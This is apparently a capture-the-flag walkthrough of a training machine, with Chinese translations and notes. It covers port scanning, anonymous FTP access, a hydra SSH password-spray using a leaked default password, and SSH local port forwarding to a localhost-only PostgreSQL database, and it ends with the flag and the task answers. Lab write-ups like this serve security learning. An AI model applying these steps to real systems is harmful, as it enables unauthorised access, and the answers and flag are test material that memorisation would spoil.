Task 1

How many TCP ports are open?

(打开了多少个 TCP 端口？)

# nmap -sS -T4 10.129.224.226 --min-rate 1000

2

Task 2

What is the name of the directory that is available on the FTP server?

(FTP 服务器上可用的目录名称是什么？)

$ nmap -sC 10.129.224.226 -p 21

21端口存在匿名访问

mail_backup

Task 3

What is the default account password that every new member on the “Funnel” team should change as soon as possible?

(“漏斗”团队的每个新成员应该尽快更改的默认帐户密码是什么？)

ftp> get ./mail_backup/password_policy.pdf ./1.pdf

funnel123#!#

Task 4

Which user has not changed their default password yet?

(哪个用户还没有更改过默认密码？)

-users.txt-
optimus
albert
andreas
christine
maria

$ hydra -L ./users.txt -p funnel123#!# ssh://10.129.224.226

christine

Task 5

Which service is running on TCP port 5432 and listens only on localhost?

(哪个服务在 TCP 端口 5432 上运行并且仅侦听本地主机？)

# nmap -sV -p 5432 10.129.224.226

postgresql

Task 6

Since you can’t access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?

(由于您无法从本地计算机访问前面提到的服务，因此您必须创建一个隧道并从您的计算机连接到它。正确使用的隧道类型是什么？远程端口转发还是本地端口转发？)

• 本地端口转发（Local Port Forwarding）： 在本地端口转发中，客户端建立一个到远程服务器的连接，并在本地主机上创建一个监听指定端口的服务。当有数据发送到本地监听的端口时，数据被加密并发送到远程服务器，然后远程服务器将其解密并转发到最终的目标。这种方式可以让客户端访问无法直接访问的服务，或者增加数据传输的安全性。本地端口转发常用于构建加密隧道，例如通过 SSH 连接远程服务器并转发本地端口以访问内部网络资源。
  ssh -L [本地地址:]本地端口:目标地址:目标端口 用户名@远程主机

• 远程端口转发（Remote Port Forwarding）： 在远程端口转发中，远程服务器建立一个到本地主机的连接，并在远程服务器上创建一个监听指定端口的服务。当有数据发送到远程服务器上的监听端口时，数据被转发到本地主机，然后本地主机将其处理。这种方式通常用于使远程服务器上的服务能够被外部访问，或者用于跨越 NAT 或防火墙访问内部网络资源。
  ssh -R [远程地址:]远程端口:目标地址:目标端口 用户名@远程主机

local port forwarding

Task 7

$ ssh -L 4444:10.129.224.226:5432 christine@10.129.224.226

让远程服务器转发自己的5432端口服务到我们主机的4444端口

连接本地转发端口

$ psql -U christine -h localhost -p 4444

christine=# \list

secrets

Task 8

Could you use a dynamic tunnel instead of local port forwarding? Yes or No.

(你能利用一个动态的隧道，而不是当地的港口转发? “是"或"否”。)

yes

Flag

christine=#\connect secrets

christine=#\dt

secrets=# select * from flag;

cf277664b1771217d7006acdea006db1